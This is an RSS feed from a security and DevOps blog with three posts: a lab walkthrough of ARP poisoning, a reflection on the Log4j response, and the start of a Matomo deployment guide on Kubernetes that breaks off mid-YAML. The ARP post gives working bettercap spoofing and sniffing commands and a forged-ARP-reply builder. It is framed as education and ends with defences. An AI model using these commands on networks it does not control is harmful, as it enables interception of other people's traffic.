<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[TFerdinand.net]]></title><description><![CDATA[TFerdinand.net]]></description><link>https://en.tferdinand.net/</link><image><url>https://en.tferdinand.net/favicon.png</url><title>TFerdinand.net</title><link>https://en.tferdinand.net/</link></image><generator>Ghost 5.75</generator><lastBuildDate>Wed, 22 Apr 2026 06:37:49 GMT</lastBuildDate><atom:link href="https://en.tferdinand.net/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Attack techniques: understanding ARP poisoning]]></title><description><![CDATA[<div class="kg-card kg-toggle-card" data-kg-toggle-state="close"><div class="kg-toggle-heading"><h4 class="kg-toggle-heading-text">Disclaimer</h4><button class="kg-toggle-card-icon"><svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/></svg></button></div><div class="kg-toggle-content"><p>As often on this kind of post, I would like to remind you that the content you will find here is for <u>educational purposes</u> only.</p><p>Unauthorized intrusion in an information system is punishable by fine and/or imprisonment.</p></div></div><p>Understanding attacks means knowing how to avoid them. 
In this post,</p>]]></description><link>https://en.tferdinand.net/attack-techniques-understanding-arp-poisoning/</link><guid isPermaLink="false">63522bc065fbc6000155a6a5</guid><category><![CDATA[Security]]></category><category><![CDATA[hacking]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Fri, 21 Oct 2022 05:37:16 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1519874894605-54cfd04fa2fc?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDI4fHxwb2lzb258ZW58MHx8fHwxNjY2MzMwMjU1&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<div class="kg-card kg-toggle-card" data-kg-toggle-state="close"><div class="kg-toggle-heading"><h4 class="kg-toggle-heading-text">Disclaimer</h4><button class="kg-toggle-card-icon"><svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/></svg></button></div><div class="kg-toggle-content"><img src="https://images.unsplash.com/photo-1519874894605-54cfd04fa2fc?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDI4fHxwb2lzb258ZW58MHx8fHwxNjY2MzMwMjU1&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" alt="Attack techniques: understanding ARP poisoning"><p>As is often the case with this kind of post, I would like to remind you that the content you will find here is for <u>educational purposes</u> only.</p><p>Unauthorized intrusion into an information system is punishable by fines and/or imprisonment.</p></div></div><p>Understanding attacks means knowing how to avoid them. 
In this post, I propose we look at a common network attack: ARP poisoning.</p><h2 id="what-is-arp">What is ARP?</h2><p>To understand the attack, we must first understand what it relies on.</p><p>For ARP, we will start from the OSI model, which describes the different layers of the network.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://en.tferdinand.net/content/images/2022/10/image-12.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="600" height="764" srcset="https://en.tferdinand.net/content/images/2022/10/image-12.png 600w"><figcaption>Source : BMC</figcaption></figure><p>ARP is the link between layers 2 and 3: it is what allows a computer or server to resolve an IP address into a hardware (MAC) address.</p><p>To work, ARP relies on broadcasts. A device that needs to reach an IP address asks the whole network who owns it, the owner replies with its hardware address, and every device caches these IP-to-MAC matches in its ARP table.</p><p>You can easily view this table with the arp -a command (on both Linux and Windows).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://en.tferdinand.net/content/images/2022/10/image-1.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="457" height="333"><figcaption>ARP Table example</figcaption></figure><h2 id="the-weakness-of-this-protocol">The weakness of this protocol</h2><p>I think you have already spotted the weak point: each node sends information, and there is no way to verify that this information is true.</p><p>So, I can very well advertise my own MAC address as belonging to the router&apos;s IP.</p><p>Each node (or each targeted node) on my network will receive this information and update its ARP table with the forged match.</p><h2 id="how-does-the-attack-work">How does the attack work?</h2><p>There is one prerequisite: being on the same network as the target.</p><p>Then the idea is to sit between the target and the router. 
This will allow me to launch a &quot;Man in the middle&quot; attack and capture all the network traffic between my target and the router.</p><p>For the example I will describe in this blog post, I will place myself between my PC and my Livebox on my own network.</p><p>To do this, I will send two different pieces of information.</p><p>From my attacking PC, I will tell my livebox that I am the victim&apos;s PC.</p><p>To my victim, I will say that I am the livebox. In this way, I can have both information flows passing through my attacking PC, positioning myself much like a proxy.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://en.tferdinand.net/content/images/2022/10/image-2.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="922" height="1364" srcset="https://en.tferdinand.net/content/images/size/w600/2022/10/image-2.png 600w, https://en.tferdinand.net/content/images/2022/10/image-2.png 922w" sizes="(min-width: 720px) 720px"><figcaption>before/after the attack</figcaption></figure><h2 id="the-attack-in-detail">The attack in detail</h2><h3 id="requirements">Requirements</h3><p>As I described above, I will need several things to proceed with my attack:</p><ul><li>Access to the same network as my target</li><li>A PC with various tools (which I will describe below)</li><li>The IP of my target, although I can do without it, as we will see</li></ul><p>In the case of this post, I will use two &quot;Lab&quot; virtual machines:</p><ul><li>My attacker will be a VM running Kali Linux</li><li>My target will be a VM running Windows 10</li></ul><h3 id="detect-the-windows-pc">Detect the Windows PC</h3><p>To perform my attack, I will use the popular <a href="https://www.bettercap.org/?ref=en.tferdinand.net">bettercap</a>.</p><p>It will provide me with all the tools I need to detect the devices on my network and perform ARP poisoning.</p><p>So I will start it with the command below:</p><!--kg-card-begin: 
markdown--><pre><code class="language-sh">bettercap -iface eth0
</code></pre>
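<p>Before diving into the modules, it is worth seeing how small the packet at the heart of this attack really is: the poisoning that follows rests on nothing more than a forged, unauthenticated ARP reply. A minimal stdlib-only sketch (this is an illustration, not part of bettercap; the attacker MAC below is made up, the IPs are the ones from this lab):</p>

```python
import struct

def build_arp_reply(sender_mac: str, sender_ip: str,
                    target_mac: str, target_ip: str) -> bytes:
    """Build the payload of an ARP 'is-at' reply (opcode 2), the exact
    packet type an ARP poisoner floods its victim with."""
    mac_bytes = lambda m: bytes.fromhex(m.replace(":", ""))
    ip_bytes = lambda i: bytes(int(part) for part in i.split("."))
    header = struct.pack(
        "!HHBBH",
        1,       # hardware type: Ethernet
        0x0800,  # protocol type: IPv4
        6, 4,    # hardware / protocol address lengths
        2,       # opcode 2 = reply ("is-at")
    )
    return (header
            + mac_bytes(sender_mac) + ip_bytes(sender_ip)
            + mac_bytes(target_mac) + ip_bytes(target_ip))

# Claim that the router's IP (192.168.109.2 in this lab) lives at the
# attacker's MAC (hypothetical value):
frame = build_arp_reply("00:0c:29:aa:bb:cc", "192.168.109.2",
                        "ff:ff:ff:ff:ff:ff", "192.168.109.130")
assert len(frame) == 28  # fixed size of an IPv4-over-Ethernet ARP payload
```

<p>Nothing in those 28 bytes is signed or verified by the receiver, which is exactly the weakness described above.</p>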
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://en.tferdinand.net/content/images/2022/10/image-3.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="932" height="112" srcset="https://en.tferdinand.net/content/images/size/w600/2022/10/image-3.png 600w, https://en.tferdinand.net/content/images/2022/10/image-3.png 932w" sizes="(min-width: 720px) 720px"><figcaption>Bettercap starting</figcaption></figure><p>Bettercap works with modules, which can be configured and executed. I won&apos;t go into the details of the modules here, and I invite you to consult the associated documentation for more details.</p><p>If necessary you can use the help command to see the available commands and modules and their status.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/10/image-4.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="1104" height="848" srcset="https://en.tferdinand.net/content/images/size/w600/2022/10/image-4.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/10/image-4.png 1000w, https://en.tferdinand.net/content/images/2022/10/image-4.png 1104w" sizes="(min-width: 720px) 720px"></figure><p>At first, we will use the &quot;net.probe&quot; module.</p><p>As its name indicates, this module will allow us to detect the devices on the network.</p><!--kg-card-begin: markdown--><pre><code>net.probe on
net.show
</code></pre>
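<p>Conceptually, the probe module walks the local subnet and solicits an answer from every candidate address. A toy stdlib-only sketch of the address space it has to cover in this lab (the actual probing and listening are left out):</p>

```python
import ipaddress

# Enumerate every candidate host address on the lab subnet used in this
# post; a probe sweep sends a packet to each of these and records replies.
subnet = ipaddress.ip_network("192.168.109.0/24")
candidates = [str(host) for host in subnet.hosts()]
print(len(candidates))                # 254 usable addresses in a /24
print(candidates[0], candidates[-1])  # first and last candidates
```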
<!--kg-card-end: markdown--><p>We find my target in the output below: it is none other than the IP <code>192.168.109.130</code>.</p><h3 id="lets-start-having-fun">Let&apos;s start having fun</h3><p>Now we&apos;re going to launch the attack on the target&apos;s ARP table.</p><p>Before we start, I&apos;ll capture my target&apos;s current table.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/10/image-5.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="471" height="224"></figure><p>The most important entry here is 192.168.109.2, which is the IP of my virtual router.</p><p>From my Kali VM, still in bettercap, I&apos;m going on the offensive!</p><!--kg-card-begin: markdown--><pre><code class="language-sh">set arp.spoof.fullduplex true          #Launch the attack on both sides: victim and router
set arp.spoof.targets 192.168.109.130  #IP address of the victim
arp.spoof on                           #Initiate the attack
</code></pre>
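<p>For repeatability, the interactive commands used so far can also be collected into a caplet file and loaded at startup with bettercap&apos;s <code>-caplet</code> flag. A sketch (the file name is hypothetical; the target IP is the one from this lab):</p>

```shell
# arp-lab.cap — hypothetical caplet, run with:
#   bettercap -iface eth0 -caplet arp-lab.cap
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.109.130
arp.spoof on
```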
<!--kg-card-end: markdown--><p>The first line is important, because it launches the attack directly on both sides.</p><p>Note that some routers are protected against ARP attacks. In this case, we will only see the frames leaving the target, but not the return traffic, which limits the attack.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/10/image-6.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="1692" height="116" srcset="https://en.tferdinand.net/content/images/size/w600/2022/10/image-6.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/10/image-6.png 1000w, https://en.tferdinand.net/content/images/size/w1600/2022/10/image-6.png 1600w, https://en.tferdinand.net/content/images/2022/10/image-6.png 1692w" sizes="(min-width: 720px) 720px"></figure><p>If I look at my target&apos;s ARP table now, we&apos;ll see that the router&apos;s IP no longer maps to the same MAC address!</p><p>By the way, we&apos;ll notice that it now has the same MAC address as my Kali VM <code>192.168.109.129</code>.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/10/image-7.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="476" height="240"></figure><p>Now I am able to see the traffic going in and out of this PC with a simple <code>net.sniff on</code>.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/10/image-8.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="1000" height="525" srcset="https://en.tferdinand.net/content/images/size/w600/2022/10/image-8.png 600w, https://en.tferdinand.net/content/images/2022/10/image-8.png 1000w" sizes="(min-width: 720px) 720px"></figure><h2 id="what-does-it-get-me-at-this-point">What does it get me at this point?</h2><p>At this point, I am able to capture all unencrypted 
traffic leaving my victim&apos;s PC.</p><p>This means I can see:</p><ul><li>HTTP calls</li><li>Unencrypted DNS requests</li><li>SNI requests</li></ul><h3 id="its-all-crap-we-only-see-http">It&apos;s all crap, we only see HTTP</h3><p>Many will say that this is a small part of the network. This is true and false at the same time.</p><p>In a company, many consider that encryption is unnecessary for internal endpoints, for example, so this attack can potentially capture a lot of traffic.</p><p>Also, knowing which sites a user visits potentially allows me to target an attack, whether phishing or social engineering.</p><p>Finally, this should be seen as a first step: once I am positioned as a man in the middle, I can also alter the traffic to change what my victim sees, but we will see this in another post!</p><h2 id="in-conclusion-beware-of-all-networks">In conclusion, beware of ALL networks</h2><p>The purpose of this post is to remind you that an attacker is not necessarily external; even from inside your corporate network it is possible to do a lot of damage.</p><p>ARP spoofing is one of the issues normally covered by most enterprise routers, but not all. 
It is important to protect yourself against it.</p><p>Most consumer routers don&apos;t offer any particular protection against this; for example, I can perform this attack on my Livebox.</p><p>This also reminds us of the importance of encrypting all traffic leaving your PC, via a VPN for example; there are still many (too many) services communicating over HTTP.</p><p>In companies, do not hesitate to impose TLS everywhere, including internally.</p>]]></content:encoded></item><item><title><![CDATA[Log4j from the eye of the storm]]></title><description><![CDATA[<p>Unless you live in a cave, you couldn&#x2019;t miss the last few days the <a href="https://logging.apache.org/log4j/2.x/security.html?ref=en.tferdinand.net">flaws discovered on the Java log4j library</a>.</p><p>I&#x2019;m not going to make another post talk about this flaw, but rather to talk about my experience in the field on the impact of</p>]]></description><link>https://en.tferdinand.net/log4j-from-the-eye-of-the-storm/</link><guid isPermaLink="false">6337ff9a65fbc6000155a569</guid><category><![CDATA[actuality]]></category><category><![CDATA[architecture]]></category><category><![CDATA[Security]]></category><category><![CDATA[java]]></category><category><![CDATA[log4j]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 20 Dec 2021 20:37:40 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1600377927594-ceae8f8981a6?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDF8fHRlbXBlc3R8ZW58MHx8fHwxNjQwMDMxNzEy&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1600377927594-ceae8f8981a6?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDF8fHRlbXBlc3R8ZW58MHx8fHwxNjQwMDMxNzEy&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="Log4j from the eye of the storm"><p>Unless you live in a cave, you couldn&#x2019;t miss the last few days the <a 
href="https://logging.apache.org/log4j/2.x/security.html?ref=en.tferdinand.net">flaws discovered on the Java log4j library</a>.</p><p>I&#x2019;m not going to write yet another post about this flaw, but rather talk about my experience in the field with its impact at the operational level.</p><h2 id="the-importance-of-having-an-up-to-date-inventory">The importance of having an up-to-date inventory</h2><p>I talked about this on Twitter (in French), but for me, this flaw highlights the fact that many companies lack an up-to-date inventory of their resources.</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="fr" dir="ltr">L&apos;asset management est primordial si vous voulez faire de la s&#xE9;curit&#xE9;!<br><br>La faille majeure <a href="https://twitter.com/hashtag/log4j?src=hash&amp;ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">#log4j</a> le rappelle, il faut patcher vite, mais pour le faire il faut avoir un inventaire &#xE0; jour!<br><br>Encore une fois, le plus important n&apos;est pas forc&#xE9;ment l&apos;application ;)</p>&#x2014; Teddy FERDINAND (@TeddyFERDINAND1) <a href="https://twitter.com/TeddyFERDINAND1/status/1469624289381040128?ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">December 11, 2021</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p>When a breach like this occurs, it is important to be able to quickly identify which resources are at risk. But having an up-to-date inventory is not just about the machines, but also about their content.</p><p>This is even more important when you exploit the power of the cloud: volatile machines make their management even more complex.</p><p>For that, there are several solutions.</p><h3 id="doing-only-infra-as-code">Doing only infra as code</h3><p>This point will seem essential to many of you, but doing only infra as code simplifies things enormously: you can quickly visualize what is being deployed, on which project, which machine, which account, etc.</p><p>In a CI/CD pipeline, it is the role of a SAST (static application security testing) tool to identify common flaws when building new projects; however, there also needs to be tooling for already compiled projects. For example, on GitHub, Dependabot fairly quickly showed me the projects in which it had identified the use of the library.</p><p>However, this point is clearly not enough. Just because I don&#x2019;t explicitly define a library doesn&#x2019;t mean it is not used.</p><h3 id="scanning-already-created-artifacts">Scanning already created artifacts</h3><p>If your applications are already compiled, your artifact repositories often offer solutions to scan them.</p><p>For example, Docker Hub allows <a href="https://docs.docker.com/engine/scan/?ref=en.tferdinand.net#scan-images-for-log4j-2-cve">you to scan your images for the library</a>.</p><p>However, this is still not enough. 
On your servers, you do not necessarily use only packages that you master and reference yourself.</p><p>For example, you can use an AWS Marketplace image from a publisher, or have third-party applications deployed in your infrastructure.</p><h3 id="continuously-scan-your-servers">Continuously scan your servers</h3><p>This is where the third level of scanning comes into play: you can continuously scan your machines to quickly identify servers in danger.</p><p>To do this, there are tools like <a href="https://fr.tenable.com/?ref=en.tferdinand.net">Tenable Nessus</a> or <a href="https://www.rapid7.com/products/insightvm/?ref=en.tferdinand.net">Rapid7 InsightVM</a>. The role of these tools is to scan your servers and report the machines at risk.</p><p>A simple search with the identifier of a CVE allows you to quickly identify the impacted servers.</p><h3 id="how-i-lived-this-stage">How I lived this stage</h3><p>Like many in infosec these last few days, I found this first step complicated. Even with tools, there is always a risk of missing some resources.</p><p>I work in a small team and we reacted as best we could, but given the risk involved with this vulnerability, we are re-running several checks. This point is exhausting, because we have to do a lot of manual actions; not everything can be automated.</p><p>It is a laborious step, mentally exhausting, but essential and critical.</p><h2 id="once-the-servers-are-identified-what-do-i-do">Once the servers are identified, what do I do?</h2><p>Now that I know which of my resources are affected by the log4j vulnerability, what do I do?</p><p>The first thing we often forget<strong>: don&#x2019;t panic!</strong></p><p>This is a behavior I often see during security incidents, yet it is all the more important to keep a cool head as a mistake can be costly!</p><h3 id="patch-patch-patch%E2%80%A6">Patch, patch, patch&#x2026;</h3><p>The solution will often be the same here: patch or update the application. 
However, not all publishers take this equally seriously.</p><p>At this point, I have seen several behaviors:</p><ul><li>Publishers who are very reactive and transparent about the risks</li><li>Publishers who say they don&#x2019;t know (which is not necessarily reassuring, by the way).</li><li>Publishers who say they are impacted, but take several days to release a version with the necessary fix</li><li>Those who say they are not impacted and then indicate the opposite</li><li>Those who prefer to state explicitly that they are not impacted because they are far from Java (for example HashiCorp and its tools written in GoLang)<br></li></ul><h3 id="depend-on-other-teams">Depend on other teams</h3><p>In my position, I am not the one who patches; I am in the team that identifies the risks, measures them and requests the necessary actions from other teams (Dev, Ops, DataOps, etc.)</p><p>It&#x2019;s a position that can be frustrating, because you depend on people over whom you have no power of prioritization, and not everyone necessarily perceives the risks of these flaws.</p><p>This is why it is important to have (once again) a pedagogical posture, and to explain the risks and why it is important to react quickly.</p><p>And it is also at this stage that it is important to trace all the requests and do the associated follow-up.</p><p>A temporary solution can sometimes be to mitigate the risk, reducing as much as possible the impact of third-party slowness. This can be done with WAF rules, package modifications directly on the machines (even if I&#x2019;m not a fan of this solution), changing the exposure of some machines (moving them behind a VPN, for example) or temporarily interrupting some services.</p><p>The temporary solution depends, of course, on the assessment of the associated risk.</p><h3 id="how-i-lived-this-stage-1">How I lived this stage</h3><p>As I mentioned, I was a bit frustrated by the lack of response from some teams, or the impression that they didn&#x2019;t 
care&#x2026; For some teams, I&#x2019;m just one incident among many already in progress, just adding one more item to the pile.</p><p>This step is not necessarily simple, but I find it simpler than building the inventory.</p><h3 id="after-log4j">After log4j</h3><p>For the moment, the log4j storm is not over, with a new flaw discovered the day before yesterday as I write these lines.</p><h3 id="invest-in-security">Invest in security</h3><p>This storm, like others before it (<a href="https://en.wikipedia.org/wiki/Spectre_(security_vulnerability)?ref=en.tferdinand.net">Spectre</a>, <a href="https://en.wikipedia.org/wiki/Meltdown_(security_vulnerability)?ref=en.tferdinand.net">Meltdown</a>, <a href="https://en.wikipedia.org/wiki/Heartbleed?ref=en.tferdinand.net">Heartbleed</a>, etc.) is an opportunity for security teams to reiterate the importance of certain investments:</p><ul><li>Having a security team that keeps up to date</li><li>Having the tools to quickly identify vulnerabilities</li><li>Having an up-to-date inventory</li><li>Educating teams on the importance of good security practices</li></ul><p>I even reiterated this point (on Twitter once again, in French) recently:</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="fr" dir="ltr">A tout ceux qui pensent que la <a href="https://twitter.com/hashtag/s%C3%A9curit%C3%A9?src=hash&amp;ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">#s&#xE9;curit&#xE9;</a> informatique est un co&#xFB;t... 
Vous avez tort!<br><br>La s&#xE9;curit&#xE9; est un <a href="https://twitter.com/hashtag/investissement?src=hash&amp;ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">#investissement</a>, tr&#xE8;s vite rentabilis&#xE9; que ce soit sur des attaques &#xE9;vit&#xE9;es ou en image de marque.<br><br>C&apos;est ce qui inspire confiance &#xE0; vos clients/utilisateurs!</p>&#x2014; Teddy FERDINAND (@TeddyFERDINAND1) <a href="https://twitter.com/TeddyFERDINAND1/status/1469261397259341825?ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">December 10, 2021</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><h3 id="fighting-the-predatory-behavior-of-big-tech">Fighting the predatory behavior of big tech </h3><p>This flaw reminds us of the harsh realities of open source projects: many projects are clearly exploited by huge companies that rely on them without ever contributing code or funding.</p><p>Log4j is a library used by millions of applications around the world, yet it is maintained by only a few people.</p><p>Many techs in the open source world have made the same observation (in French, once again):</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="fr" dir="ltr">1/7 Depuis le d&#xE9;but du week-end, une faille, nomm&#xE9;e log4shell et jug&#xE9;e comme la plus importante faille de s&#xE9;curit&#xE9; de ces 10 derni&#xE8;res ann&#xE9;es, agite le monde de la tech. L&apos;immense majorit&#xE9; des entreprises de la tech est touch&#xE9;e, allant de Microsoft &#xE0; Spotify en passant par Tesla. <a href="https://t.co/o2gsKeORAy?ref=en.tferdinand.net">pic.twitter.com/o2gsKeORAy</a></p>&#x2014; Olivier P&#x1F92B;ncet (@ponceto91) <a href="https://twitter.com/ponceto91/status/1470301903250771969?ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">December 13, 2021</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p>This is not unlike recent battles:</p><ul><li>Elastic.co VS AWS</li><li>MongoDB VS AWS</li></ul><p>In the absence of a viable alternative, the response is often legal: adding license clauses that prevent these companies from using the projects, because they exploit the wealth of these projects without ever giving anything in return.</p>]]></content:encoded></item><item><title><![CDATA[OpenSource Traefik ratings with Matomo]]></title><description><![CDATA[<p>Some time ago, I talked to you about tracking and <a href="https://en.tferdinand.net/why-do-i-care-about-my-personal-data/">why I care about my privacy</a>. In my conclusion, I indicated that user tracking was still a useful tool for a company, as long as it was ethical and respectful of users.</p><p>However, very often, I see that Google Analytics</p>]]></description><link>https://en.tferdinand.net/opensource-traefik-ratings-with-matomo/</link><guid isPermaLink="false">6337ff9a65fbc6000155a570</guid><category><![CDATA[Docker]]></category><category><![CDATA[Traefik]]></category><category><![CDATA[Google]]></category><category><![CDATA[Kubernetes]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 15 Feb 2021 07:34:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--4-.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--4-.jpg" alt="OpenSource Traefik ratings with Matomo"><p>Some time ago, I talked to you about tracking and <a href="https://en.tferdinand.net/why-do-i-care-about-my-personal-data/">why I care about my privacy</a>. In my conclusion, I indicated that user tracking was still a useful tool for a company, as long as it was ethical and respectful of users.</p><p>However, very often, I see that Google Analytics is used by the sites I browse. It is far (even very far) from being respectful of your users&apos; data. Even worse! 
You allow Google to know the activity of your site from end to end and to better target its ads (among other things).</p><p>Today, I propose we look at how to track users while respecting them.</p><h2 id="what-is-matomo">What is Matomo?</h2><p>Matomo is an OpenSource alternative to Google Analytics. Available on GitHub, it allows you to deploy a complete application with a dashboard and a tracking system in JavaScript. It is also possible to rely on reading server logs rather than JavaScript.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/matomo-org/matomo?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - matomo-org/matomo: Liberating Web Analytics. Star us on Github? +1. Matomo is the leading open alternative to Google Analytics that gives you full control over your data. Matomo lets you easily collect data from websites &amp; apps and visualise this data and extract insights. Privacy is built-in. We love Pull Requests!</div><div class="kg-bookmark-description">Liberating Web Analytics. Star us on Github? +1. Matomo is the leading open alternative to Google Analytics that gives you full control over your data. Matomo lets you easily collect data from webs...</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="OpenSource Traefik ratings with Matomo"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">matomo-org</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/945ba5a26678eb77b11f2a150bffe5ae10963554e70a0b9d73ef81afc6295b57/matomo-org/matomo" alt="OpenSource Traefik ratings with Matomo"></div></a></figure><p>Having an open source solution lets you know its inner workings, but above all it guarantees respect for your users. 
Free software today powers the majority of the internet (including this website).</p><p>Matomo provides the classically used statistics, including (non-exhaustively):</p><ul><li>The pages visited</li><li>The &quot;User Agent&quot; (OS, Browser, language, etc.)</li><li>The conversion rate from social networks</li><li>GeoIP location</li><li>The bounce rate</li><li>Session duration</li></ul><p>Based on the classic but efficient PHP + MySQL pairing, the application is lightweight and also integrates privacy-respecting components:</p><ul><li>Support for the DoNotTrack header, which lets visitors indicate that they do not want the website to track their activity</li><li>Support for GDPR (RGPD) constraints (informed consent): Matomo can be enabled or disabled directly for each user</li><li>Native anonymization or pseudonymization of data</li></ul><p>Thus it is possible to have clear and complete statistics without being intrusive.</p><p>Note that there is also a solution managed directly by Matomo, available on their website.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://fr.matomo.org/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Matomo - L&#x2019;alternative &#xE0; Google Analytics qui prot&#xE8;ge vos donn&#xE9;es</div><div class="kg-bookmark-description">Matomo est l&#x2019;alternative &#xE9;thique &#xE0; Google Analytics qui prot&#xE8;ge vos donn&#xE9;es et la vie priv&#xE9;e de vos clients Une puissante plateforme d&#x2019;analyse Web avec la propri&#xE9;t&#xE9; de 100 % des donn&#xE9;es.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://static.matomo.org/wp-content/uploads/2018/11/cropped-DefaultIcon-270x270.png" alt="OpenSource Traefik ratings with Matomo"><span class="kg-bookmark-author">Analytics Platform - Matomo</span><span class="kg-bookmark-publisher">Himanshu Sharma | Digital Marketing 
Consultant</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://matomo.org/wp-content/uploads/2020/06/website-graphics-2020-v5-1.png" alt="OpenSource Traefik ratings with Matomo"></div></a></figure><p>In the case I&apos;m going to present today, we&apos;ll start from the official Docker image.</p><h2 id="deploying-matomo-in-kubernetes">Deploying Matomo in Kubernetes</h2><p>As usual on this blog, I&apos;m going to talk about deploying in Kubernetes, because that&apos;s what I have on hand and it&apos;s becoming more and more common today.</p><p>As a reminder, my deployment is not an enterprise &quot;prod ready&quot; deployment: it doesn&apos;t handle high availability, and scaling is catastrophic since the database is in the same pod. This post is simply a &quot;demo&quot; of what is possible so you can easily adapt it to your needs. The idea is, of course, that you can make the tool your own.</p><p>Although the deployment is in Kubernetes, it remains easily transposable to Docker or Docker-compose (or podman, or rancher, etc.).</p><p>So here&apos;s the deployment we&apos;re going to do; in blue are the elements we&apos;re going to create:</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-1-1.png" class="kg-image" alt="OpenSource Traefik ratings with Matomo" loading="lazy" width="1042" height="1062" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-1-1.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/image-1-1.png 1000w, https://en.tferdinand.net/content/images/2022/01/image-1-1.png 1042w" sizes="(min-width: 720px) 720px"></figure><p>So we will have 3 yaml files:</p><ul><li>A &quot;deployment&quot; carrying Matomo and MySql</li><li>A &quot;service&quot; exposing Matomo</li><li>An &quot;IngressRoute&quot; allowing Traefik to serve Matomo and manage its TLS certificate</li></ul><h3 id="the-deployment">The deployment</h3><p>We are here on something very 
basic:</p><ul><li>Two images (Matomo and MySQL)</li><li>A database configuration (user, default database, etc.)</li><li>Some persistent storage</li></ul><pre><code class="language-yaml">apiVersion: apps/v1
kind: Deployment
metadata:
  name: matomo
  labels:
    app: matomo
spec:
  replicas: 1
  selector:
    matchLabels:
      app: matomo
  template:
    metadata:
      labels:
        app: matomo
    spec:
      containers:
      - name: matomo
        image: matomo:4.1.1-apache
        imagePullPolicy: Always
        ports:
        - containerPort: 80
        env:
        - name: MATOMO_DATABASE_HOST
          value: 127.0.0.1
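          # note: 127.0.0.1 works because both containers run in the same pod
          # and therefore share a single network namespace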
        - name: MATOMO_DATABASE_USERNAME
          value: &quot;root&quot;
